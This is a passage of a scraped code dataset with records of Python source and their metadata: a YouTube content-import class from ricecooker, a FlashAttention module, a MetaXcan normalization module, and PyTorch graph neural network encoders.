method.\n \"\"\"\n\n CONTENT_ARCHIVE_VERSION = 1\n DATA_DIR = os.path.abspath(\"chefdata\")\n YOUTUBE_CACHE_DIR = os.path.join(DATA_DIR, \"youtubecache\")\n DOWNLOADS_DIR = os.path.join(DATA_DIR, \"downloads\")\n ARCHIVE_DIR = os.path.join(\n DOWNLOADS_DIR, \"archive_{}\".format(CONTENT_ARCHIVE_VERSION)\n )\n USE_PROXY = False\n\n def get_playlist_ids(self):\n \"\"\"\n This method should be implemented by subclasses and return a list of playlist IDs.\n It currently doesn't support full YouTube URLs.\n\n :return: A list of playlists to include in the channel, defaults to empty list.\n \"\"\"\n return []\n\n def get_video_ids(self):\n \"\"\"\n This method should be implemented by subclasses and return a list of video IDs.\n It currently doesn't support full YouTube URLs.\n\n :return: A list of videos to include in the channel, defaults to empty list.\n \"\"\"\n return []\n\n def get_channel_metadata(self):\n \"\"\"\n Must be implemented by subclasses. Returns a dictionary. 
Keys can be a special value 'defaults'\n or a specific playlist or video id to apply the value to.\n\n Currently supported metadata fields are 'license', 'author', and 'provider'.\n\n :return: A dictionary of metadata values to apply to the content.\n \"\"\"\n raise NotImplementedError(\"get_channel_metadata must be implemented.\")\n\n def get_metadata_for_video(self, field, youtube_id=None, playlist_id=None):\n \"\"\"\n Retrieves the metadata value for the metadata field \"field\". If the\n youtube_id or playlist_id are specified, it will try to retrieve values\n for that specific video or playlist. If not found, it will look for a default\n value and return that.\n\n :param field: String name of metadata field.\n :param youtube_id: String ID of the video to retrieve data for. Defaults to None.\n :param playlist_id: String ID of the playlist to retrieve data for. Defaults to None.\n\n :return: The value (typically string), or None if not found.\n \"\"\"\n metadata = self.get_channel_metadata()\n if youtube_id and youtube_id in metadata and field in metadata[youtube_id]:\n return metadata[youtube_id][field]\n elif playlist_id and playlist_id in metadata and field in metadata[playlist_id]:\n return metadata[playlist_id][field]\n elif field in metadata[\"defaults\"]:\n return metadata[\"defaults\"][field]\n\n return None\n\n def create_nodes_for_playlists(self):\n # Note: We build the tree and download at the same time here for convenience. YT playlists\n # usually aren't massive, and parallel downloading increases the chances of being blocked.\n # We may want to experiment with parallel downloading in the future.\n\n os.makedirs(self.ARCHIVE_DIR, exist_ok=True)\n\n playlist_nodes = []\n\n for playlist_id in self.get_playlist_ids():\n\n playlist = YouTubePlaylistUtils(\n id=playlist_id, cache_dir=self.YOUTUBE_CACHE_DIR\n )\n\n playlist_info = playlist.get_playlist_info(use_proxy=self.USE_PROXY)\n\n # Get channel description if there is any\n playlist_description = \"\"\n if playlist_info[\"description\"]:\n playlist_description = playlist_info[\"description\"]\n\n topic_source_id = \"playlist-{0}\".format(playlist_id)\n topic_node = nodes.TopicNode(\n title=playlist_info[\"title\"],\n source_id=topic_source_id,\n description=playlist_description,\n )\n playlist_nodes.append(topic_node)\n\n video_ids = []\n\n # insert videos into playlist topic after creation\n for child in playlist_info[\"children\"]:\n # check for duplicate videos\n if child[\"id\"] not in video_ids:\n video_node = self.create_video_node(\n child, parent_id=topic_source_id\n )\n if video_node:\n topic_node.add_child(video_node)\n video_ids.append(child[\"id\"])\n\n else:\n continue\n\n return playlist_nodes\n\n def create_video_node(self, video_id, parent_id=\"\", playlist_id=None):\n video = YouTubeVideoUtils(id=video_id, cache_dir=False)\n video_details = video.get_video_info(use_proxy=self.USE_PROXY)\n if not video_details:\n config.LOGGER.error(\"Unable to retrieve video info: {}\".format(video_id))\n return None\n video_source_id = \"{0}-{1}\".format(parent_id, video_details[\"id\"])\n\n # Check youtube thumbnail extension as some are not supported formats\n thumbnail_link = video_details[\"thumbnail\"]\n config.LOGGER.info(\"thumbnail = {}\".format(thumbnail_link))\n archive_filename = get_archive_filename(\n thumbnail_link, download_root=self.ARCHIVE_DIR\n )\n\n dest_file = os.path.join(self.ARCHIVE_DIR, archive_filename)\n os.makedirs(os.path.dirname(dest_file), exist_ok=True)\n config.LOGGER.info(\"dest_file = 
{}\".format(dest_file))\n\n # Download and convert thumbnail, if necessary.\n response = requests.get(thumbnail_link, stream=True)\n # Some images that YT returns are actually webp despite their extension,\n # so make sure we update our file extension to match.\n if (\n \"Content-Type\" in response.headers\n and response.headers[\"Content-Type\"] == \"image/webp\"\n ):\n base_path, ext = os.path.splitext(dest_file)\n dest_file = base_path + \".webp\"\n\n if response.status_code == 200:\n with open(dest_file, \"wb\") as f:\n for chunk in response.iter_content(1024):\n f.write(chunk)\n\n if dest_file.lower().endswith(\".webp\"):\n dest_file = convert_image(dest_file)\n\n video_node = nodes.VideoNode(\n source_id=video_source_id,\n title=video_details[\"title\"],\n description=video_details[\"description\"],\n language=self.channel_info[\"CHANNEL_LANGUAGE\"],\n author=self.get_metadata_for_video(\"author\", video_id, playlist_id) or \"\",\n provider=self.get_metadata_for_video(\"provider\", video_id, playlist_id)\n or \"\",\n thumbnail=dest_file,\n license=self.get_metadata_for_video(\"license\", video_id, playlist_id),\n files=[\n files.YouTubeVideoFile(\n youtube_id=video_id,\n language=\"en\",\n high_resolution=self.get_metadata_for_video(\n \"high_resolution\", video_id, playlist_id\n )\n or False,\n )\n ],\n )\n return video_node\n\n def create_nodes_for_videos(self):\n node_list = []\n for video_id in self.get_video_ids():\n node = self.create_video_node(video_id)\n if node:\n node_list.append(node)\n\n return node_list\n\n def construct_channel(self, *args, **kwargs):\n \"\"\"\n Default construct_channel method for YouTubeSushiChef, override if more custom handling\n is needed.\n \"\"\"\n channel = self.get_channel(*args, **kwargs)\n\n if len(self.get_playlist_ids()) == 0 and len(self.get_video_ids()) == 0:\n raise NotImplementedError(\n \"Either get_playlist_ids() or get_video_ids() must be implemented.\"\n )\n\n # TODO: Replace next line with chef code\n nodes = self.create_nodes_for_playlists()\n for node in nodes:\n channel.add_child(node)\n\n nodes = self.create_nodes_for_videos()\n for node in nodes:\n channel.add_child(node)\n\n return channel\n", "repo_name": "learningequality/ricecooker", "sub_path": "ricecooker/chefs.py", "file_name": "chefs.py", "file_ext": "py", "file_size_in_byte": 37099, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 16, "dataset": "github-code", "pt": "61", "api": [{"api_name": "classes.nodes.ChannelNode", "line_number": 51, "usage_type": "attribute"}, {"api_name": "classes.nodes", "line_number": 51, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 67, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 75, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 89, "usage_type": "call"}, {"api_name": "managers.progress.Status", "line_number": 147, "usage_type": "name"}, {"api_name": "exceptions.InvalidUsageException", "line_number": 259, "usage_type": "call"}, {"api_name": "exceptions.InvalidUsageException", "line_number": 264, "usage_type": "call"}, {"api_name": "utils.tokens.get_content_curation_token", "line_number": 276, "usage_type": "call"}, {"api_name": "exceptions.InvalidUsageException", "line_number": 288, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 302, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 304, "usage_type": "attribute"}, {"api_name": "logging.WARNING", "line_number": 306, "usage_type": "attribute"}, 
{"api_name": "logging.ERROR", "line_number": 308, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 314, "usage_type": "call"}, {"api_name": "os.path", "line_number": 314, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 315, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 316, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 316, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 317, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 317, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 318, "usage_type": "call"}, {"api_name": "os.path", "line_number": 318, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 319, "usage_type": "call"}, {"api_name": "os.path", "line_number": 319, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 356, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 386, "usage_type": "call"}, {"api_name": "os.path", "line_number": 386, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 387, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 390, "usage_type": "call"}, {"api_name": "os.path", "line_number": 390, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 393, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 394, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 399, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 405, "usage_type": "call"}, {"api_name": "os.path", "line_number": 405, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 406, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 407, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 409, "usage_type": "call"}, {"api_name": "os.path", "line_number": 409, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 422, "usage_type": "call"}, {"api_name": "os.path", "line_number": 422, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 423, "usage_type": "call"}, {"api_name": "os.path", "line_number": 423, "usage_type": "attribute"}, {"api_name": "csv.DictReader", "line_number": 424, "usage_type": "call"}, {"api_name": "re.split", "line_number": 444, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 449, "usage_type": "call"}, {"api_name": "classes.nodes.ChannelNode", "line_number": 456, "usage_type": "attribute"}, {"api_name": "classes.nodes", "line_number": 456, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 491, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 491, "usage_type": "name"}, {"api_name": "commands.uploadchannel_wrapper", "line_number": 497, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 568, "usage_type": "call"}, {"api_name": "os.path", "line_number": 568, "usage_type": "attribute"}, {"api_name": "utils.jsontrees.read_tree_from_json", "line_number": 574, "usage_type": "call"}, {"api_name": "utils.jsontrees.get_channel_node_from_json", "line_number": 575, "usage_type": "call"}, {"api_name": "utils.jsontrees.read_tree_from_json", "line_number": 584, "usage_type": "call"}, {"api_name": "utils.jsontrees.build_tree_from_json", "line_number": 585, "usage_type": "call"}, {"api_name": "exceptions.raise_for_invalid_channel", "line_number": 586, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", 
"line_number": 613, "usage_type": "call"}, {"api_name": "utils.linecook.FolderExistsAction", "line_number": 621, "usage_type": "name"}, {"api_name": "utils.metadata_provider.DEFAULT_CHANNEL_INFO_FILENAME", "line_number": 626, "usage_type": "name"}, {"api_name": "utils.metadata_provider.DEFAULT_CONTENT_INFO_FILENAME", "line_number": 631, "usage_type": "name"}, {"api_name": "utils.metadata_provider.DEFAULT_EXERCISES_INFO_FILENAME", "line_number": 636, "usage_type": "name"}, {"api_name": "utils.metadata_provider.DEFAULT_EXERCISE_QUESTIONS_INFO_FILENAME", "line_number": 641, "usage_type": "name"}, {"api_name": "utils.metadata_provider.CsvMetadataProvider", "line_number": 656, "usage_type": "call"}, {"api_name": "utils.metadata_provider.CsvMetadataProvider", "line_number": 672, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 682, "usage_type": "call"}, {"api_name": "utils.metadata_provider.CsvMetadataProvider", "line_number": 687, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 697, "usage_type": "call"}, {"api_name": "utils.linecook.build_ricecooker_json_tree", "line_number": 705, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 719, "usage_type": "call"}, {"api_name": "os.path", "line_number": 719, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 720, "usage_type": "call"}, {"api_name": "os.path", "line_number": 720, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 721, "usage_type": "call"}, {"api_name": "os.path", "line_number": 721, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 722, "usage_type": "call"}, {"api_name": "os.path", "line_number": 722, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 784, "usage_type": "call"}, {"api_name": "utils.youtube.YouTubePlaylistUtils", "line_number": 790, "usage_type": "call"}, {"api_name": "classes.nodes.TopicNode", "line_number": 802, "usage_type": "call"}, {"api_name": "classes.nodes", "line_number": 802, "usage_type": "name"}, {"api_name": "utils.youtube.YouTubeVideoUtils", "line_number": 828, "usage_type": "call"}, {"api_name": "utils.downloader.get_archive_filename", "line_number": 838, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 842, "usage_type": "call"}, {"api_name": "os.path", "line_number": 842, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 843, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 843, "usage_type": "call"}, {"api_name": "os.path", "line_number": 843, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 847, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 854, "usage_type": "call"}, {"api_name": "os.path", "line_number": 854, "usage_type": "attribute"}, {"api_name": "ricecooker.utils.images.convert_image", "line_number": 863, "usage_type": "call"}, {"api_name": "classes.nodes.VideoNode", "line_number": 865, "usage_type": "call"}, {"api_name": "classes.nodes", "line_number": 865, "usage_type": "name"}, {"api_name": "classes.files.YouTubeVideoFile", "line_number": 876, "usage_type": "call"}, {"api_name": "classes.files", "line_number": 876, "usage_type": "name"}, {"api_name": "classes.nodes", "line_number": 910, "usage_type": "name"}, {"api_name": "classes.nodes", "line_number": 911, "usage_type": "name"}, {"api_name": "classes.nodes", "line_number": 914, "usage_type": "name"}, {"api_name": "classes.nodes", "line_number": 915, "usage_type": "name"}]} +{"seq_id": "13546187859", 
"text": "# This file is the implementation of FlashAttention introduced in\n# \"FlashAttention: Fast and Memory-Efficient Exact Attention with IO-Awareness\"\n# Supported pattern of the code: Noncausal Self, Causal Self.\n# The code comes from https://github.com/HazyResearch/flash-attention.git.\n\nimport math\nfrom typing import Dict, Optional, Tuple\n\nimport torch\n# import flash_attn_cuda\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom efficient_attention import AbstractAttention, register_cls\nfrom efficient_attention.modules.multihead_attention import \\\n _append_prev_key_padding_mask\nfrom einops import rearrange, repeat\nfrom torch import Tensor\nfrom flash_attn.modules.mha import FlashSelfAttention, FlashCrossAttention\n\n\nclass FlashAttention(AbstractAttention):\n def __init__(self, embed_dim, num_heads, dropout=0.0, bias=True, **kwargs):\n super().__init__(**kwargs)\n self.embed_dim = embed_dim\n self.num_heads = num_heads\n assert self.embed_dim % num_heads == 0, \"self.kdim must be divisible by num_heads\"\n self.head_dim = self.embed_dim // num_heads\n assert self.head_dim in [16, 32, 64, 128], \"Only support head_dim == 16, 32, 64, or 128\"\n self.Wqkv = nn.Linear(embed_dim, 3 * embed_dim, bias=bias)\n\n self.inner_attn = FlashSelfAttention(causal=self.causal, attention_dropout=dropout, softmax_scale=self.head_dim ** -0.5)\n self.out_proj = nn.Linear(embed_dim, embed_dim, bias=bias)\n\n self._reset_parameters()\n\n def _reset_parameters(self):\n for proj in [self.k_proj, self.v_proj, self.q_proj, self.out_proj]:\n kwargs = {'gain': 1 / math.sqrt(2)} if proj is not self.out_proj else {}\n nn.init.xavier_uniform_(proj.weight, **kwargs)\n if proj.bias is not None:\n nn.init.constant_(proj.bias, 0.0)\n\n def forward(self, query,\n key=None,\n value=None,\n query_padding_mask: Optional[Tensor] = None,\n key_padding_mask: Optional[Tensor] = None,\n need_weights: bool = False,\n need_head_weights: bool = False,\n attn_mask: Optional[Tensor] = None,\n static_kv: bool = False,\n incremental_state: Optional[Dict[str, Dict[str, Optional[Tensor]]]] = None,\n batch_first: bool = False,\n **kwargs\n ) -> Tuple[Tensor, Optional[Tensor]]:\n x = query\n if not batch_first:\n x = torch.transpose(x, 0, 1)\n\n qkv = self.Wqkv(x)\n qkv = rearrange(qkv, 'b s (three h d) -> b s three h d', three=3, h=self.num_heads)\n context = self.inner_attn(qkv)\n context = rearrange(context, 'b s h d -> b s (h d)')\n\n attn = self.out_proj(context.transpose(1, 2)).transpose(1, 2)\n\n if not batch_first:\n attn = attn.transpose(0, 1)\n return attn, None\n", "repo_name": "Shark-NLP/CAB", "sub_path": "efficient-attention/efficient_attention/modules/flash_attn.py", "file_name": "flash_attn.py", "file_ext": "py", "file_size_in_byte": 2912, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 21, "dataset": "github-code", "pt": "61", "api": [{"api_name": "efficient_attention.AbstractAttention", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 29, "usage_type": "name"}, {"api_name": "flash_attn.modules.mha.FlashSelfAttention", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 32, "usage_type": "name"}, {"api_name": "math.sqrt", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.nn.init.xavier_uniform_", "line_number": 39, "usage_type": "call"}, {"api_name": 
"torch.nn.init", "line_number": 39, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 39, "usage_type": "name"}, {"api_name": "torch.nn.init.constant_", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 41, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 41, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 46, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 46, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 47, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 47, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 50, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 50, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 52, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 52, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 52, "usage_type": "name"}, {"api_name": "torch.transpose", "line_number": 58, "usage_type": "call"}, {"api_name": "einops.rearrange", "line_number": 61, "usage_type": "call"}, {"api_name": "einops.rearrange", "line_number": 63, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 55, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 55, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 55, "usage_type": "name"}]} +{"seq_id": "2580023633", "text": "__author__ = 'heroico'\n\nimport numpy\nimport logging\nimport math\n\nNONE=\"none\"\nFROM_PHENO=\"from_pheno\"\nFROM_REFERENCE=\"from_reference\"\n\ndef normalizationScheme(scheme, covariances=None, weight_db_logic=None):\n n = None\n if scheme == NONE:\n n = NoNormalization()\n elif scheme == FROM_PHENO:\n n = _BetaNormalization()\n elif scheme == FROM_REFERENCE:\n n = _ReferenceNormalization(covariances, weight_db_logic)\n else:\n raise Exception(\"Unknown normalization: %s\", scheme if scheme else None)\n return n\n\nclass Normalization(object):\n def __init__(self):\n pass\n\n def update(self, beta_sets):\n pass\n\n def calculateNormalization(self):\n return 1\n\nclass NoNormalization(Normalization):\n pass\n\nclass _BetaNormalization(Normalization):\n def __init__(self):\n self.ses = []\n self.sigmas = []\n\n def update(self, beta_sets):\n se = beta_sets[\"se\"]\n self.ses.append(se)\n\n sigma = beta_sets[\"sigma_l\"]\n self.sigmas.append(sigma)\n\n def calculateNormalization(self):\n logging.info(\"Calculating normalization from phenotype\")\n y = []\n x = []\n for i, ses_data in enumerate(self.ses):\n logging.log(6,\"processing standard error %i\", i)\n sigma_data = self.sigmas[i]\n for j in xrange(0, len(ses_data.data)):\n se = ses_data.data[j]\n sigma = sigma_data.data[j]\n if se == \"NA\" or sigma == \"NA\":\n continue\n\n y.append(1/float(se))\n s = float(sigma)\n x.append(s)\n\n x = numpy.array(x)\n x = x[:,numpy.newaxis]\n y = numpy.array(y)\n a = numpy.linalg.lstsq(x,y)[0]\n return float(a)\n\nclass _ReferenceNormalization(Normalization):\n def __init__(self, covariances, weight_db_logic):\n self.ses = []\n self.covariances = covariances\n self.weight_db_logic = weight_db_logic\n\n def update(self, beta_sets):\n se = beta_sets[\"se\"]\n self.ses.append(se)\n\n def calculateNormalization(self):\n logging.info(\"Calculating normalization from reference\")\n y = []\n x = []\n for i, ses_data in enumerate(self.ses):\n for j in xrange(0, len(ses_data.data)):\n se = ses_data.data[j]\n if se == \"NA\":\n continue\n\n rsid = 
ses_data.keys[j]\n genes = self.weight_db_logic.genes_for_an_rsid[rsid]\n gene_count = len(genes)\n if not gene_count:\n logging.log(5, \"no genes for rsid %s, skipping\", rsid)\n continue\n\n entry = None\n for gene in genes:\n if gene in self.covariances:\n entry = self.covariances[gene]\n logging.log(5, \"picked gene %s for rsid %s from %d\", gene, rsid, gene_count)\n break\n\n if not entry:\n logging.log(8, \"rsid %s without proper covariance matrix, skipping\", rsid)\n continue\n\n covariance_matrix = entry[0]\n valid_rsids = entry[1]\n if not rsid in valid_rsids:\n logging.log(8, \"rsid %s not in covariance matrix, skipping\", rsid)\n continue\n\n index = valid_rsids.index(rsid)\n sigma = math.sqrt(covariance_matrix[index][index])\n s = float(sigma)\n x.append(s)\n\n y.append(1/float(se))\n\n x = numpy.array(x)\n x = x[:,numpy.newaxis]\n y = numpy.array(y)\n a = numpy.linalg.lstsq(x,y)[0]\n return float(a)\n", "repo_name": "hakyimlab/MetaXcan", "sub_path": "software/metax/deprecated/Normalization.py", "file_name": "Normalization.py", "file_ext": "py", "file_size_in_byte": 3764, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 117, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.info", "line_number": 49, "usage_type": "call"}, {"api_name": "logging.log", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 66, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.linalg.lstsq", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 68, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 82, "usage_type": "call"}, {"api_name": "logging.log", "line_number": 95, "usage_type": "call"}, {"api_name": "logging.log", "line_number": 102, "usage_type": "call"}, {"api_name": "logging.log", "line_number": 106, "usage_type": "call"}, {"api_name": "logging.log", "line_number": 112, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 123, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.linalg.lstsq", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 125, "usage_type": "attribute"}]} +{"seq_id": "5851052874", "text": "import math\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\n\nfrom ..utils import my_softmax, EPSILON\nfrom ..utils.distibutions import gumbel_softmax\n\n_EPS = EPSILON\n\n\nclass MLP(nn.Module):\n \"\"\"Two-layer fully-connected ELU net with batch norm.\"\"\"\n\n def __init__(self, n_in, n_hid, n_out, do_prob=0.):\n super(MLP, self).__init__()\n self.fc1 = nn.Linear(n_in, n_hid)\n self.fc2 = nn.Linear(n_hid, n_out)\n self.bn = nn.BatchNorm1d(n_out)\n self.dropout_prob = do_prob\n\n self.init_weights()\n\n def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Linear):\n nn.init.xavier_normal(m.weight.data)\n m.bias.data.fill_(0.1)\n elif isinstance(m, nn.BatchNorm1d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n\n def batch_norm(self, inputs):\n \"\"\" All nodes are treated the same for normalization's sake\"\"\"\n x = inputs\n x = self.bn(x)\n return x\n\n def forward(self, inputs):\n # 
Input shape: [num_sims, num_things, num_features]\n x = F.elu(self.fc1(inputs))\n x = F.dropout(x, self.dropout_prob, training=self.training)\n x = F.elu(self.fc2(x))\n return self.batch_norm(x)\n\n\nclass CNN(nn.Module):\n def __init__(self, n_in, n_hid, n_out, do_prob=0.):\n super(CNN, self).__init__()\n self.pool = nn.MaxPool1d(kernel_size=2, stride=None, padding=0,\n dilation=1, return_indices=False,\n ceil_mode=False)\n\n self.conv1 = nn.Conv1d(n_in, n_hid, kernel_size=5, stride=1, padding=0)\n self.bn1 = nn.BatchNorm1d(n_hid)\n self.conv2 = nn.Conv1d(n_hid, n_hid, kernel_size=5, stride=1, padding=0)\n self.bn2 = nn.BatchNorm1d(n_hid)\n self.conv_predict = nn.Conv1d(n_hid, n_out, kernel_size=1)\n self.conv_attention = nn.Conv1d(n_hid, 1, kernel_size=1)\n self.dropout_prob = do_prob\n\n self.init_weights()\n\n def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv1d):\n n = m.kernel_size[0] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2. / n))\n m.bias.data.fill_(0.1)\n elif isinstance(m, nn.BatchNorm1d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n\n def forward(self, inputs):\n # Input shape: [num_sims * num_edges, num_dims, num_timesteps]\n\n x = F.relu(self.conv1(inputs))\n x = self.bn1(x)\n x = F.dropout(x, self.dropout_prob, training=self.training)\n x = self.pool(x)\n x = F.relu(self.conv2(x))\n x = self.bn2(x)\n pred = self.conv_predict(x)\n attention = my_softmax(self.conv_attention(x), axis=2)\n\n edge_prob = (pred * attention).mean(dim=2)\n return edge_prob\n\n\nclass MLPEncoder(nn.Module):\n def __init__(self, n_in, n_hid, n_out, do_prob=0., factor=True):\n super(MLPEncoder, self).__init__()\n\n self.factor = factor\n\n self.mlp1 = MLP(n_in, n_hid, n_hid, do_prob)\n self.mlp2 = MLP(n_hid * 2, n_hid, n_hid, do_prob)\n self.mlp3 = MLP(n_hid, n_hid, n_hid, do_prob)\n if self.factor:\n self.mlp4 = MLP(n_hid * 2, n_hid, n_hid, do_prob)\n print(\"Using factor graph MLP encoder.\")\n else:\n self.mlp4 = MLP(n_hid * 2, n_hid, n_hid, do_prob)\n print(\"Using MLP encoder.\")\n self.fc_out = nn.Linear(n_hid * 2, n_out)\n self.init_weights()\n\n def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Linear):\n nn.init.xavier_normal(m.weight.data)\n m.bias.data.fill_(0.1)\n\n def edge2node(self, x, rel_rec, rel_send):\n # NOTE: Assumes that we have the same graph across all samples.\n incoming = torch.matmul(rel_rec.t(), x)\n return incoming / incoming.size(1)\n\n def node2edge(self, x, rel_rec, rel_send):\n # NOTE: Assumes that we have the same graph across all samples.\n receivers = torch.matmul(rel_rec, x)\n senders = torch.matmul(rel_send, x)\n edges = torch.cat([receivers, senders], dim=1)\n return edges\n\n def forward(self, input, rel_rec, rel_send):\n\n x = input.view(input.size(0) * input.size(1), -1)\n\n x = self.mlp1(x) # 2-layer ELU net per node\n\n x = self.node2edge(x, rel_rec, rel_send)\n x = self.mlp2(x)\n x = self.edge2node(x, rel_rec, rel_send)\n x_skip = x\n x = self.mlp3(x)\n x = self.node2edge(x, rel_rec, rel_send)\n x = self.mlp4(x)\n x = self.edge2node(x, rel_rec, rel_send)\n x = torch.cat((x, x_skip), dim=1) # Skip connection\n\n output = self.fc_out(x)\n\n return output.view(input.size(0), input.size(1), -1)\n\n\nclass SolutionFaeture(nn.Module):\n\n def __init__(self, feature_size, n_hid, n_out, do_prob=0.):\n super(SolutionFaeture, self).__init__()\n self.mlp1 = MLP(feature_size, n_hid, n_hid, do_prob)\n self.fc_out = nn.Linear(n_hid, n_out)\n\n self.bce_loss = nn.BCEWithLogitsLoss(size_average=True)\n\n 
def forward(self, solution_codes):\n x = self.mlp1(solution_codes)\n return self.fc_out(x)\n\n\nclass CNNEncoder(nn.Module):\n def __init__(self, n_in, n_hid, n_out, do_prob=0., factor=True):\n super(CNNEncoder, self).__init__()\n self.dropout_prob = do_prob\n\n self.factor = factor\n\n self.cnn = CNN(n_in * 2, n_hid, n_hid, do_prob)\n self.mlp1 = MLP(n_hid, n_hid, n_hid, do_prob)\n self.mlp2 = MLP(n_hid, n_hid, n_hid, do_prob)\n self.mlp3 = MLP(n_hid * 3, n_hid, n_hid, do_prob)\n self.fc_out = nn.Linear(n_hid, n_out)\n\n if self.factor:\n print(\"Using factor graph CNN encoder.\")\n else:\n print(\"Using CNN encoder.\")\n\n self.init_weights()\n\n def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Linear):\n nn.init.xavier_normal(m.weight.data)\n m.bias.data.fill_(0.1)\n\n def node2edge_temporal(self, inputs, rel_rec, rel_send):\n # NOTE: Assumes that we have the same graph across all samples.\n\n x = inputs.view(inputs.size(0), inputs.size(1), -1)\n\n receivers = torch.matmul(rel_rec, x)\n receivers = receivers.view(inputs.size(0) * receivers.size(1),\n inputs.size(2), inputs.size(3))\n receivers = receivers.transpose(2, 1)\n\n senders = torch.matmul(rel_send, x)\n senders = senders.view(inputs.size(0) * senders.size(1),\n inputs.size(2),\n inputs.size(3))\n senders = senders.transpose(2, 1)\n\n # receivers and senders have shape:\n # [num_sims * num_edges, num_dims, num_timesteps]\n edges = torch.cat([receivers, senders], dim=1)\n return edges\n\n def edge2node(self, x, rel_rec, rel_send):\n # NOTE: Assumes that we have the same graph across all samples.\n incoming = torch.matmul(rel_rec.t(), x)\n return incoming / incoming.size(1)\n\n def node2edge(self, x, rel_rec, rel_send):\n # NOTE: Assumes that we have the same graph across all samples.\n receivers = torch.matmul(rel_rec, x)\n senders = torch.matmul(rel_send, x)\n edges = torch.cat([receivers, senders], dim=2)\n return edges\n\n def forward(self, inputs, rel_rec, rel_send):\n\n # Input has shape: [num_sims, num_atoms, num_timesteps, num_dims]\n edges = self.node2edge_temporal(inputs, rel_rec, rel_send)\n x = self.cnn(edges)\n x = x.view(inputs.size(0), (inputs.size(1) - 